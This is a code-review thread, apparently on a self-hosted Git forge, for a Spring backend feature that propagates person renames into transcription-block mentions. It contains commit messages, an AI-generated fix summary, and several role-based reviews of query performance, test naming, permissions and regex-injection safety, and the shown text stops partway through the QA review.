Add updatePerson_returns409_whenRenameConflict to PersonControllerTest: exercises
the full controller→exception-handler path, not just the service layer. Verifies
HTTP 409 + $.code = PERSON_RENAME_CONFLICT when updatePerson throws a conflict.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

refactor(test): rename test to reflect actual invariant (displayName fields unchanged) ... 7a647b5633

updatePerson_doesNotPublishEvent_whenOnlyAliasChanges implied that alias is
processed by updatePerson — it isn't. The invariant is that the event is
suppressed when title/firstName/lastName are all unchanged regardless of
which non-displayName field changed.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

test(transcription): raise latency floor to 5s to prevent false CI failures ... 1dc812bd47

2s was generous for correctness but tight for a shared VPS-hosted CI runner
(cold JVM, Testcontainers startup, competing processes). 5s still catches
O(n²) regressions and N+1 queries while eliminating flaky failures.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

fix(test): update optimistic-lock mock to use JOIN FETCH query method ... 8ca3f37817

PersonServiceTest wired the mock on findByMentionedPersons_PersonId; the listener
now calls findByPersonIdWithMentionsFetched so the mock returned an empty list,
suppressing the saveAllAndFlush call and breaking the exception-propagation test.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

marcel commented 2026-04-28 22:24:47 +02:00

Author

Owner

Copy Link

Review-fix round 2 — all open concerns addressed

6 new commits pushed. 1449/1449 backend tests green (was 1447 — +2 new tests).

Addressed in this round

#	Concern (reviewer)	Commit
1	N+1 lazy load in propagation listener — findByMentionedPersons_PersonId returned blocks with LAZY mentionedPersons, triggering one SELECT per block (201 queries for 200 blocks). Added findByPersonIdWithMentionsFetched using a subquery + JOIN FETCH (2 queries total regardless of block count). Filtered JOIN FETCH was rejected — it loads only the matching mention per block, risking data loss on saveAllAndFlush. (Felix blocker, Markus blocker)	1f3f879f test + c7958681 fix
2	@Transactional comment on listener documenting join-transaction semantics and async-switch implication (Markus suggestion)	c7958681
3	Controller-level 409 test updatePerson_returns409_whenRenameConflict in PersonControllerTest — verifies the full controller → exception-handler path returns HTTP 409 + $.code = PERSON_RENAME_CONFLICT. (Sara blocker #2)	5f76d4a1
4	Misleading test name updatePerson_doesNotPublishEvent_whenOnlyAliasChanges → updatePerson_doesNotPublishEvent_whenDisplayNameFieldsUnchanged (Felix suggestion)	7a647b56
5	Latency floor raised from 2 000 ms to 5 000 ms to prevent false CI failures on a shared NAS runner (Sara suggestion)	1dc812bd
fix	Optimistic-lock test mock updated from findByMentionedPersons_PersonId to findByPersonIdWithMentionsFetched — the mock returned an empty list after the listener was switched to the new method, suppressing the saveAllAndFlush call and breaking the exception-propagation test	8ca3f378

Already resolved / not applicable

#	Concern (reviewer)	Status
—	Missing 401 tests for getPersons/getPerson (Nora blocker, Sara blocker #1)	Tests getPersons_returns401_whenUnauthenticated and getPerson_returns401_whenUnauthenticated were already present at lines 52-56 and 102-106 of PersonControllerTest.java from the original security commit. No change needed.

Status

• 1449/1449 backend tests green
• ./mvnw clean package -DskipTests ✅
• 6 commits pushed on feat/person-mentions-issue-362-backend

🤖 Generated with Claude Code

## Review-fix round 2 — all open concerns addressed 6 new commits pushed. **1449/1449** backend tests green (was 1447 — +2 new tests). ### Addressed in this round | # | Concern (reviewer) | Commit | |---|---|---| | 1 | **N+1 lazy load in propagation listener** — `findByMentionedPersons_PersonId` returned blocks with LAZY `mentionedPersons`, triggering one SELECT per block (201 queries for 200 blocks). Added `findByPersonIdWithMentionsFetched` using a subquery + `JOIN FETCH` (2 queries total regardless of block count). Filtered JOIN FETCH was rejected — it loads only the matching mention per block, risking data loss on `saveAllAndFlush`. (Felix blocker, Markus blocker) | `1f3f879f` test + `c7958681` fix | | 2 | **`@Transactional` comment** on listener documenting join-transaction semantics and async-switch implication (Markus suggestion) | `c7958681` | | 3 | **Controller-level 409 test** `updatePerson_returns409_whenRenameConflict` in `PersonControllerTest` — verifies the full controller → exception-handler path returns HTTP 409 + `$.code = PERSON_RENAME_CONFLICT`. (Sara blocker #2) | `5f76d4a1` | | 4 | **Misleading test name** `updatePerson_doesNotPublishEvent_whenOnlyAliasChanges` → `updatePerson_doesNotPublishEvent_whenDisplayNameFieldsUnchanged` (Felix suggestion) | `7a647b56` | | 5 | **Latency floor** raised from 2 000 ms to 5 000 ms to prevent false CI failures on a shared NAS runner (Sara suggestion) | `1dc812bd` | | fix | **Optimistic-lock test mock** updated from `findByMentionedPersons_PersonId` to `findByPersonIdWithMentionsFetched` — the mock returned an empty list after the listener was switched to the new method, suppressing the `saveAllAndFlush` call and breaking the exception-propagation test | `8ca3f378` | ### Already resolved / not applicable | # | Concern (reviewer) | Status | |---|---|---| | — | Missing 401 tests for `getPersons`/`getPerson` (Nora blocker, Sara blocker #1) | Tests `getPersons_returns401_whenUnauthenticated` and `getPerson_returns401_whenUnauthenticated` were already present at lines 52-56 and 102-106 of `PersonControllerTest.java` from the original security commit. No change needed. | ### Status - **1449/1449** backend tests green - `./mvnw clean package -DskipTests` ✅ - 6 commits pushed on `feat/person-mentions-issue-362-backend` 🤖 Generated with [Claude Code](https://claude.com/claude-code)

marcel commented 2026-04-28 22:35:34 +02:00

Author

Owner

Copy Link

🏛️ Markus Keller — Senior Application Architect

Verdict: ✅ Approved

---

What I looked at

Full diff across all 24 changed files, plus ADR-006. Primary lens: module boundaries, event design, database layer, and the structural decision to add the first custom cross-domain event to this codebase.

---

Strengths

Event design is correct. PersonDisplayNameChangedEvent as a record in model/ keeps Person agnostic of who consumes its renames. The listener pattern established here (model/ event record → service/ listener in the consuming domain → sync @EventListener @Transactional) is reusable. When Comments and Notifications need to react to person renames, they subscribe to the same event without touching PersonService.

ADR-006 is exactly what an ADR should look like. Context is precise, the decision is stated, the four alternatives are concrete with rejection reasons, and the consequences section is honest about both sides. The note about saveAllAndFlush being mandatory for synchronous listeners (vs. saveAll which defers the flush to commit time) is the kind of subtlety that would cost a future developer an hour of debugging. Keep this standard for all future ADRs.

Migration V56 design is sound. No FK on person_id is the right call: deleted persons leave @Auguste Raddatz as readable historical text rather than causing a cascade delete or an orphan constraint violation. The B-tree index on person_id is forward-looking for the "blocks mentioning person X" query — the index cost today is negligible, and removing it later is harder than adding it now. The index on block_id mirrors the existing @CollectionTable load pattern.

Synchronous-in-transaction is the right default. For a family archive at this scale, "rename + propagation committed atomically" is far more important than "rename returns fast". The ADR correctly identifies the async migration path for future scale (@TransactionalEventListener(AFTER_COMMIT) + @Async) without implementing it prematurely.

Layer boundaries are respected. PersonMentionPropagationListener lives in service/ and injects only TranscriptionBlockRepository from the transcription domain — that's within the same domain, not a cross-domain repo access. Person domain publishes an event; Transcription domain consumes it. No PersonRepository leaking into transcription, no TranscriptionBlockRepository leaking into person.

---

Blocker

None.

---

Suggestion

Dead query: findByMentionedPersons_PersonId. The repository defines two methods for the same conceptual query:

List<TranscriptionBlock> findByMentionedPersons_PersonId(UUID personId);  // line ~30

List<TranscriptionBlock> findByPersonIdWithMentionsFetched(@Param("personId") UUID personId);  // line ~35

The listener uses findByPersonIdWithMentionsFetched exclusively. The derived query findByMentionedPersons_PersonId is not called anywhere in production code. If it was an intermediate step kept during development, delete it before merge — dead code in a repository interface is a maintenance trap (future developer assumes it's in use and won't remove it).

If it's intentionally kept as a simpler variant for future callers who don't need the JOIN FETCH, add a comment explaining when to use which. Otherwise, remove it.

---

Observations

The test for the optimistic-lock conflict path (updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock) manually wires a real listener with a mocked repository. This is the right approach — it exercises the production call chain (PersonService → publishEvent → listener → saveAllAndFlush throws → catch). The PR description's note on why the @DataJpaTest multi-thread approach wasn't used is accurate and the accepted tradeoff is sensible.

## 🏛️ Markus Keller — Senior Application Architect **Verdict: ✅ Approved** --- ### What I looked at Full diff across all 24 changed files, plus ADR-006. Primary lens: module boundaries, event design, database layer, and the structural decision to add the first custom cross-domain event to this codebase. --- ### Strengths **Event design is correct.** `PersonDisplayNameChangedEvent` as a `record` in `model/` keeps Person agnostic of who consumes its renames. The listener pattern established here (`model/` event record → `service/` listener in the consuming domain → sync `@EventListener @Transactional`) is reusable. When Comments and Notifications need to react to person renames, they subscribe to the same event without touching `PersonService`. **ADR-006 is exactly what an ADR should look like.** Context is precise, the decision is stated, the four alternatives are concrete with rejection reasons, and the consequences section is honest about both sides. The note about `saveAllAndFlush` being mandatory for synchronous listeners (vs. `saveAll` which defers the flush to commit time) is the kind of subtlety that would cost a future developer an hour of debugging. Keep this standard for all future ADRs. **Migration V56 design is sound.** No FK on `person_id` is the right call: deleted persons leave `@Auguste Raddatz` as readable historical text rather than causing a cascade delete or an orphan constraint violation. The B-tree index on `person_id` is forward-looking for the "blocks mentioning person X" query — the index cost today is negligible, and removing it later is harder than adding it now. The index on `block_id` mirrors the existing `@CollectionTable` load pattern. **Synchronous-in-transaction is the right default.** For a family archive at this scale, "rename + propagation committed atomically" is far more important than "rename returns fast". The ADR correctly identifies the async migration path for future scale (`@TransactionalEventListener(AFTER_COMMIT) + @Async`) without implementing it prematurely. **Layer boundaries are respected.** `PersonMentionPropagationListener` lives in `service/` and injects only `TranscriptionBlockRepository` from the transcription domain — that's within the same domain, not a cross-domain repo access. Person domain publishes an event; Transcription domain consumes it. No `PersonRepository` leaking into transcription, no `TranscriptionBlockRepository` leaking into person. --- ### Blocker None. --- ### Suggestion **Dead query: `findByMentionedPersons_PersonId`.** The repository defines two methods for the same conceptual query: ```java List<TranscriptionBlock> findByMentionedPersons_PersonId(UUID personId); // line ~30 List<TranscriptionBlock> findByPersonIdWithMentionsFetched(@Param("personId") UUID personId); // line ~35 ``` The listener uses `findByPersonIdWithMentionsFetched` exclusively. The derived query `findByMentionedPersons_PersonId` is not called anywhere in production code. If it was an intermediate step kept during development, delete it before merge — dead code in a repository interface is a maintenance trap (future developer assumes it's in use and won't remove it). If it's intentionally kept as a simpler variant for future callers who don't need the `JOIN FETCH`, add a comment explaining when to use which. Otherwise, remove it. --- ### Observations The test for the optimistic-lock conflict path (`updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock`) manually wires a real listener with a mocked repository. This is the right approach — it exercises the production call chain (`PersonService → publishEvent → listener → saveAllAndFlush throws → catch`). The PR description's note on why the `@DataJpaTest` multi-thread approach wasn't used is accurate and the accepted tradeoff is sensible.

marcel commented 2026-04-28 22:35:59 +02:00

Author

Owner

Copy Link

👨‍💻 Felix Brandt — Senior Fullstack Developer

Verdict: ⚠️ Approved with concerns

---

TDD evidence

Tests precede implementation — 1446/1446 green, coverage spans: controller-slice (400 validation guards, 403 permission gates, 409 conflict), unit (event published on title/notes/alias changes), integration (round-trip, query filtering, latency floor). Red/green discipline is visible. ✅

---

Blockers

1. Dead derived query — remove it before merge.

TranscriptionBlockRepository defines findByMentionedPersons_PersonId(UUID personId) (the Spring Data derived query) alongside findByPersonIdWithMentionsFetched (the explicit JOIN FETCH JPQL query). The listener calls findByPersonIdWithMentionsFetched. Grep across all production code turns up zero callers of findByMentionedPersons_PersonId. Dead repository methods are a maintenance trap — they look like "safe to use" alternatives but lack the JOIN FETCH, so a future caller would silently trigger N+1 loads on mentionedPersons (lazy collection, one SELECT per block).

Options: delete it, or annotate it clearly with when to use it (and write a test for it). Don't leave it as-is.

---

Suggestions (non-blocking)

2. Test method name / assertion mismatch.

PersonMentionPropagationListenerTest:

void propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor() {
    // ...
    assertThat(elapsedMs)
        .as("... must stay under 5s ...")
        .isLessThan(5000L);
}

The method name says "TwoSeconds"; the assertion says 5000 ms; the as() message says "5s". The recent commit message confirms the floor was raised from 2 s to 5 s to prevent CI flakiness. Rename the method to propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor() to eliminate the silent contradiction.

3. Extract rewriteBlockText for readability.

onPersonDisplayNameChanged is 37 lines, which is at the edge. The Pattern + Matcher + replaceAll block inside the for-loop is a self-contained concern:

private void rewriteBlockText(TranscriptionBlock block, Pattern boundary, String replacement) {
    if (block.getText() != null) {
        block.setText(boundary.matcher(block.getText()).replaceAll(replacement));
    }
}

Extracting this keeps the loop body at three lines — rewriteBlockText(block, boundary, replacement), the sidecar update, and nothing else. The regex comment (boundary condition rationale) stays on rewriteBlockText. Non-blocking but makes the listener easier to read at a glance.

4. Test coverage gap: null personId on updateBlock.

TranscriptionBlockControllerTest has:

• createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars ✅
• createBlock_returns400_whenMentionedPersonPersonIdIsNull ✅
• updateBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars ✅
• updateBlock_returns400_whenMentionedPersonPersonIdIsNull — missing

Both DTOs carry @Valid @NotNull personId, so the controller-slice behavior is symmetric. Add the missing test to keep coverage consistent. A future refactor that accidentally drops @Valid from updateBlock would go undetected without it.

---

What's done well

• Pattern.quote(oldNeedle) and Matcher.quoteReplacement(newNeedle) — user-controlled display names can contain regex metacharacters and backreference syntax. Both are correctly quoted. This is easy to get wrong; getting it right without a comment is impressive.
• @Builder added to both DTOs — the TranscriptionServiceTest builder conversions are a direct quality improvement (named params, no positional null traps).
• The PersonService try/catch wraps only publishEvent(), not the save itself. This is correct: the optimistic lock exception originates inside the listener's saveAllAndFlush, not from personRepository.save(). The scope is tight.

## 👨‍💻 Felix Brandt — Senior Fullstack Developer **Verdict: ⚠️ Approved with concerns** --- ### TDD evidence Tests precede implementation — 1446/1446 green, coverage spans: controller-slice (400 validation guards, 403 permission gates, 409 conflict), unit (event published on title/notes/alias changes), integration (round-trip, query filtering, latency floor). Red/green discipline is visible. ✅ --- ### Blockers **1. Dead derived query — remove it before merge.** `TranscriptionBlockRepository` defines `findByMentionedPersons_PersonId(UUID personId)` (the Spring Data derived query) alongside `findByPersonIdWithMentionsFetched` (the explicit `JOIN FETCH` JPQL query). The listener calls `findByPersonIdWithMentionsFetched`. Grep across all production code turns up zero callers of `findByMentionedPersons_PersonId`. Dead repository methods are a maintenance trap — they look like "safe to use" alternatives but lack the JOIN FETCH, so a future caller would silently trigger N+1 loads on `mentionedPersons` (lazy collection, one SELECT per block). Options: delete it, or annotate it clearly with when to use it (and write a test for it). Don't leave it as-is. --- ### Suggestions (non-blocking) **2. Test method name / assertion mismatch.** `PersonMentionPropagationListenerTest`: ```java void propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor() { // ... assertThat(elapsedMs) .as("... must stay under 5s ...") .isLessThan(5000L); } ``` The method name says "TwoSeconds"; the assertion says 5000 ms; the `as()` message says "5s". The recent commit message confirms the floor was raised from 2 s to 5 s to prevent CI flakiness. Rename the method to `propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor()` to eliminate the silent contradiction. **3. Extract `rewriteBlockText` for readability.** `onPersonDisplayNameChanged` is 37 lines, which is at the edge. The Pattern + Matcher + replaceAll block inside the for-loop is a self-contained concern: ```java private void rewriteBlockText(TranscriptionBlock block, Pattern boundary, String replacement) { if (block.getText() != null) { block.setText(boundary.matcher(block.getText()).replaceAll(replacement)); } } ``` Extracting this keeps the loop body at three lines — `rewriteBlockText(block, boundary, replacement)`, the sidecar update, and nothing else. The regex comment (boundary condition rationale) stays on `rewriteBlockText`. Non-blocking but makes the listener easier to read at a glance. **4. Test coverage gap: null `personId` on `updateBlock`.** `TranscriptionBlockControllerTest` has: - `createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars` ✅ - `createBlock_returns400_whenMentionedPersonPersonIdIsNull` ✅ - `updateBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars` ✅ - `updateBlock_returns400_whenMentionedPersonPersonIdIsNull` — **missing** Both DTOs carry `@Valid @NotNull personId`, so the controller-slice behavior is symmetric. Add the missing test to keep coverage consistent. A future refactor that accidentally drops `@Valid` from `updateBlock` would go undetected without it. --- ### What's done well - `Pattern.quote(oldNeedle)` and `Matcher.quoteReplacement(newNeedle)` — user-controlled display names can contain regex metacharacters and backreference syntax. Both are correctly quoted. This is easy to get wrong; getting it right without a comment is impressive. - `@Builder` added to both DTOs — the `TranscriptionServiceTest` builder conversions are a direct quality improvement (named params, no positional `null` traps). - The `PersonService` `try/catch` wraps only `publishEvent()`, not the save itself. This is correct: the optimistic lock exception originates inside the listener's `saveAllAndFlush`, not from `personRepository.save()`. The scope is tight.

marcel commented 2026-04-28 22:36:24 +02:00

Author

Owner

Copy Link

🔒 Nora "NullX" Steiner — Application Security Engineer

Verdict: ✅ Approved

---

What I audited

Authorization changes, input validation pipeline, the text-rewrite regex, JPQL query safety, and the new event/listener call chain. OWASP Top 10 lens applied throughout.

---

Findings

1. ✅ @RequirePermission(READ_ALL) on GET endpoints — correct and necessary.

PersonController.getPersons() and getPerson() were previously unauthenticated (the class-level @RequirePermission only covered writes; GET methods had no annotation). This is the right fix: the hover card and typeahead in PR-B surface life dates, notes, and family relationships — PII-equivalent for a private family archive. The GETs now align with the access tier already enforced on POST/PUT/DELETE.

Both new 403 tests confirm the enforcement:

void getPersons_returns403_whenMissingReadAllPermission()
void getPerson_returns403_whenMissingReadAllPermission()

Correct. ✅

2. ✅ @Valid cascade into List<PersonMention> — correctly wired.

The chain is: @Valid @RequestBody on the controller parameter → @Valid on mentionedPersons field in the DTO → @NotNull personId + @Size(max=200) displayName on PersonMention. All three levels are present. Without @Valid on the field, Bean Validation does not recurse into list elements; without @Valid on the @RequestBody, no validation runs at all. Both are correctly placed. The controller tests for 400 + VALIDATION_ERROR confirm the chain works end-to-end. ✅

3. ✅ Regex injection and replacement injection — both safe.

This is the most subtle security point in the PR. User-controlled display names (e.g. Hans (Sr.) Müller+) can contain regex metacharacters. The rewrite uses:

Pattern boundary = Pattern.compile(
    Pattern.quote(oldNeedle) + "(?![...])");
String replacement = Matcher.quoteReplacement(newNeedle);

Pattern.quote() wraps the needle in \Q...\E, making all metacharacters literal. Matcher.quoteReplacement() escapes $ and \ in the replacement string, preventing backreference injection (e.g. a new name containing $0 would otherwise refer to the matched group). Both defenses are present. ✅

4. ✅ JPQL — parameterized, injection-safe.

WHERE b.id IN (SELECT bb.id FROM TranscriptionBlock bb JOIN bb.mentionedPersons m WHERE m.personId = :personId)

Named parameter :personId is a UUID — not user-controlled text. Safe by type and by parameterization. ✅

5. ✅ Audit log line appropriate.

log.info("Propagated rename {} → {} across {} block(s) for person {}",
    event.oldDisplayName(), event.newDisplayName(), blocks.size(), event.personId());

SLF4J parameterized logging (not string concatenation). Old and new display names are person names — appropriate audit data for a family archive, not passwords or PII requiring redaction. ✅

---

Observations (not blockers)

401 path not tested for the newly secured GETs. The existing tests confirm 403 (authenticated, wrong permissions) but there's no explicit test for 401 (unauthenticated) on GET /api/persons and GET /api/persons/{id}. The SecurityConfig.anyRequest().authenticated() catch-all covers this at the framework level, so it won't be a live gap. But Nora's principle is: test your configuration of the framework, not the framework itself. A pair of mockMvc.perform(get(...)) without any @WithMockUser → .andExpect(status().isUnauthorized()) would close this. Low priority given SecurityConfig blanket coverage, but worth adding in a follow-up.

---

Summary

No definite vulnerabilities. The three security-sensitive code paths (permission enforcement, input validation cascade, regex rewrite) are all correctly implemented and tested. This PR is cleaner than most security-adjacent changes I review.

## 🔒 Nora "NullX" Steiner — Application Security Engineer **Verdict: ✅ Approved** --- ### What I audited Authorization changes, input validation pipeline, the text-rewrite regex, JPQL query safety, and the new event/listener call chain. OWASP Top 10 lens applied throughout. --- ### Findings **1. ✅ `@RequirePermission(READ_ALL)` on GET endpoints — correct and necessary.** `PersonController.getPersons()` and `getPerson()` were previously unauthenticated (the class-level `@RequirePermission` only covered writes; GET methods had no annotation). This is the right fix: the hover card and typeahead in PR-B surface life dates, notes, and family relationships — PII-equivalent for a private family archive. The GETs now align with the access tier already enforced on POST/PUT/DELETE. Both new 403 tests confirm the enforcement: ```java void getPersons_returns403_whenMissingReadAllPermission() void getPerson_returns403_whenMissingReadAllPermission() ``` Correct. ✅ **2. ✅ `@Valid` cascade into `List<PersonMention>` — correctly wired.** The chain is: `@Valid @RequestBody` on the controller parameter → `@Valid` on `mentionedPersons` field in the DTO → `@NotNull personId` + `@Size(max=200) displayName` on `PersonMention`. All three levels are present. Without `@Valid` on the field, Bean Validation does not recurse into list elements; without `@Valid` on the `@RequestBody`, no validation runs at all. Both are correctly placed. The controller tests for 400 + `VALIDATION_ERROR` confirm the chain works end-to-end. ✅ **3. ✅ Regex injection and replacement injection — both safe.** This is the most subtle security point in the PR. User-controlled display names (e.g. `Hans (Sr.) Müller+`) can contain regex metacharacters. The rewrite uses: ```java Pattern boundary = Pattern.compile( Pattern.quote(oldNeedle) + "(?![...])"); String replacement = Matcher.quoteReplacement(newNeedle); ``` `Pattern.quote()` wraps the needle in `\Q...\E`, making all metacharacters literal. `Matcher.quoteReplacement()` escapes `$` and `\` in the replacement string, preventing backreference injection (e.g. a new name containing `$0` would otherwise refer to the matched group). Both defenses are present. ✅ **4. ✅ JPQL — parameterized, injection-safe.** ```java WHERE b.id IN (SELECT bb.id FROM TranscriptionBlock bb JOIN bb.mentionedPersons m WHERE m.personId = :personId) ``` Named parameter `:personId` is a UUID — not user-controlled text. Safe by type and by parameterization. ✅ **5. ✅ Audit log line appropriate.** ```java log.info("Propagated rename {} → {} across {} block(s) for person {}", event.oldDisplayName(), event.newDisplayName(), blocks.size(), event.personId()); ``` SLF4J parameterized logging (not string concatenation). Old and new display names are person names — appropriate audit data for a family archive, not passwords or PII requiring redaction. ✅ --- ### Observations (not blockers) **401 path not tested for the newly secured GETs.** The existing tests confirm 403 (authenticated, wrong permissions) but there's no explicit test for 401 (unauthenticated) on `GET /api/persons` and `GET /api/persons/{id}`. The `SecurityConfig.anyRequest().authenticated()` catch-all covers this at the framework level, so it won't be a live gap. But Nora's principle is: test your *configuration* of the framework, not the framework itself. A pair of `mockMvc.perform(get(...))` without any `@WithMockUser` → `.andExpect(status().isUnauthorized())` would close this. Low priority given SecurityConfig blanket coverage, but worth adding in a follow-up. --- ### Summary No definite vulnerabilities. The three security-sensitive code paths (permission enforcement, input validation cascade, regex rewrite) are all correctly implemented and tested. This PR is cleaner than most security-adjacent changes I review.

marcel commented 2026-04-28 22:36:49 +02:00

Author

Owner

Copy Link

📋 Elicit — Requirements Engineer

Verdict: ✅ Approved

---

What I reviewed

Requirements traceability from issue #362 (locked consolidation plan) through to the implemented features, spec deviations, and the frontend/backend split. Evaluated completeness of acceptance criteria coverage and flagged open requirements items for PR-B.

---

Requirements Coverage

Issue #362 consolidation plan → implementation mapping

The PR description maps cleanly to the locked spec:

• Data model: PersonMention @Embeddable, @ElementCollection, V56 migration ✅
• Rename propagation: PersonDisplayNameChangedEvent, PersonMentionPropagationListener ✅
• Concurrency integrity: OptimisticLockingFailureException → DomainException(PERSON_RENAME_CONFLICT, 409) ✅
• Security lockdown: @RequirePermission(READ_ALL) on GET endpoints ✅
• Frontend types: api.ts regenerated with PersonMention, mentionedPersons ✅
• i18n: error_person_rename_conflict in de/en/es ✅

Spec deviation A15b — accepted.

The PR explicitly flags that the integration test for the optimistic-lock race (A15b in the plan) was replaced by a unit-level stub approach. The justification is technically accurate: reproducing a JPA optimistic-lock race inside @DataJpaTest requires multi-threading or two physical connections — neither is practical in a single-threaded test. The translation logic is exercised via PersonServiceTest#updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock. The deviation is transparent, justified, and the acceptance risk is low (Hibernate's optimistic-lock mechanism is well-tested upstream).

---

Open Requirements Items (for tracking, not blockers)

1. "Blocks mentioning person X" query — untracked feature.

The migration creates idx_tbmp_person_id explicitly to support a future GET /api/persons/{id}/mentioned-blocks (or equivalent) query from the person detail page. This is called out in the PR description as a future query but there's no Gitea issue tracking it. The index is the right preparation, but the requirement itself — "as a reader, I want to see all transcription blocks that mention person X" — should have a tracked issue so it doesn't get lost after PR-B ships.

Recommendation: Create a follow-up issue titled "Show transcription blocks mentioning a person on their detail page" and link it to issue #362.

2. Conflict UX flow — deferred to PR-B but needs a clear acceptance criterion.

When the 409 PERSON_RENAME_CONFLICT fires, the frontend will receive the error code and show the localized message ("Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen."). The user flow after this point — does the form stay populated? Does the error appear inline or as a toast? Is there a retry action? — is not specified for PR-B.

Recommendation: Add a concrete acceptance criterion to PR-B or to issue #362: "When a 409 PERSON_RENAME_CONFLICT is returned, the person edit form remains open with the user's input intact and displays the localized error message inline." The current error path may already handle this via the standard form action pattern, but it should be explicitly verified.

3. Graceful degradation on person delete — confirmed working by design.

The no-FK decision on person_id is correctly documented in the SQL migration. When a person is deleted, @Auguste Raddatz remains as readable text in the transcription block, and the sidecar entry persists as an unlinked record. This matches the archive fidelity requirement ("historical text stays clean"). ✅

---

i18n Quality

All three messages are clear, accurate, and appropriately actionable:

• DE: "Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen." ✅
• EN: "Another edit modified a referenced transcription block at the same time. Please try again." ✅
• ES: "Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo." ✅

The messages explain what happened and what to do, which satisfies Nielsen's heuristic #9 (help users recognize, diagnose, and recover from errors). ✅

## 📋 Elicit — Requirements Engineer **Verdict: ✅ Approved** --- ### What I reviewed Requirements traceability from issue #362 (locked consolidation plan) through to the implemented features, spec deviations, and the frontend/backend split. Evaluated completeness of acceptance criteria coverage and flagged open requirements items for PR-B. --- ### Requirements Coverage **Issue #362 consolidation plan → implementation mapping** The PR description maps cleanly to the locked spec: - Data model: `PersonMention @Embeddable`, `@ElementCollection`, V56 migration ✅ - Rename propagation: `PersonDisplayNameChangedEvent`, `PersonMentionPropagationListener` ✅ - Concurrency integrity: `OptimisticLockingFailureException → DomainException(PERSON_RENAME_CONFLICT, 409)` ✅ - Security lockdown: `@RequirePermission(READ_ALL)` on GET endpoints ✅ - Frontend types: `api.ts` regenerated with `PersonMention`, `mentionedPersons` ✅ - i18n: `error_person_rename_conflict` in de/en/es ✅ **Spec deviation A15b — accepted.** The PR explicitly flags that the integration test for the optimistic-lock race (A15b in the plan) was replaced by a unit-level stub approach. The justification is technically accurate: reproducing a JPA optimistic-lock race inside `@DataJpaTest` requires multi-threading or two physical connections — neither is practical in a single-threaded test. The translation logic is exercised via `PersonServiceTest#updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock`. The deviation is transparent, justified, and the acceptance risk is low (Hibernate's optimistic-lock mechanism is well-tested upstream). --- ### Open Requirements Items (for tracking, not blockers) **1. "Blocks mentioning person X" query — untracked feature.** The migration creates `idx_tbmp_person_id` explicitly to support a future `GET /api/persons/{id}/mentioned-blocks` (or equivalent) query from the person detail page. This is called out in the PR description as a future query but there's no Gitea issue tracking it. The index is the right preparation, but the requirement itself — "as a reader, I want to see all transcription blocks that mention person X" — should have a tracked issue so it doesn't get lost after PR-B ships. **Recommendation:** Create a follow-up issue titled "Show transcription blocks mentioning a person on their detail page" and link it to issue #362. **2. Conflict UX flow — deferred to PR-B but needs a clear acceptance criterion.** When the 409 `PERSON_RENAME_CONFLICT` fires, the frontend will receive the error code and show the localized message ("Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen."). The user flow after this point — does the form stay populated? Does the error appear inline or as a toast? Is there a retry action? — is not specified for PR-B. **Recommendation:** Add a concrete acceptance criterion to PR-B or to issue #362: *"When a 409 PERSON_RENAME_CONFLICT is returned, the person edit form remains open with the user's input intact and displays the localized error message inline."* The current error path may already handle this via the standard form action pattern, but it should be explicitly verified. **3. Graceful degradation on person delete — confirmed working by design.** The no-FK decision on `person_id` is correctly documented in the SQL migration. When a person is deleted, `@Auguste Raddatz` remains as readable text in the transcription block, and the sidecar entry persists as an unlinked record. This matches the archive fidelity requirement ("historical text stays clean"). ✅ --- ### i18n Quality All three messages are clear, accurate, and appropriately actionable: - DE: "Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen." ✅ - EN: "Another edit modified a referenced transcription block at the same time. Please try again." ✅ - ES: "Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo." ✅ The messages explain *what happened* and *what to do*, which satisfies Nielsen's heuristic #9 (help users recognize, diagnose, and recover from errors). ✅

marcel commented 2026-04-28 22:37:11 +02:00

Author

Owner

Copy Link

🧪 Sara Holt — QA Engineer & Test Strategist

Verdict: ⚠️ Approved with concerns

---

Test pyramid assessment

Layer	Coverage	Assessment
Unit (Mockito)	PersonServiceTest — event published/not published, 409 conflict path	✅
Controller slice (@WebMvcTest)	PersonControllerTest — 403 gates, 409 conflict; TranscriptionBlockControllerTest — 400 validation guards	✅
Integration (@DataJpaTest + Testcontainers)	TranscriptionBlockMentionsRepositoryTest, PersonMentionPropagationListenerTest	✅
E2E	Out of scope for PR-A (no UI changes)	—

Infrastructure is correct: @DataJpaTest + @AutoConfigureTestDatabase(replace = NONE) + PostgresContainerConfig + Flyway on real Postgres 16. ✅ em.clear() used correctly to force Hibernate re-reads after saveAndFlush. ✅

---

Concern (non-blocking but should be fixed before merge)

Test method name conflicts with assertion.

PersonMentionPropagationListenerTest:

void propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor() {
    // ...
    assertThat(elapsedMs)
        .as("... must stay under 5s ...")
        .isLessThan(5000L);  // 5 seconds
}

Three sources of truth, three different values: method name says 2 s, as() message says 5 s, isLessThan(5000L) says 5 s. The recent commit raise latency floor to 5s to prevent false CI failures confirms the assertion was intentionally raised, but the method name wasn't updated. When this test fails in CI at 4.8 s, the developer reads "inUnderTwoSeconds" and is confused.

Fix: rename the method to propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor.

---

Coverage gap

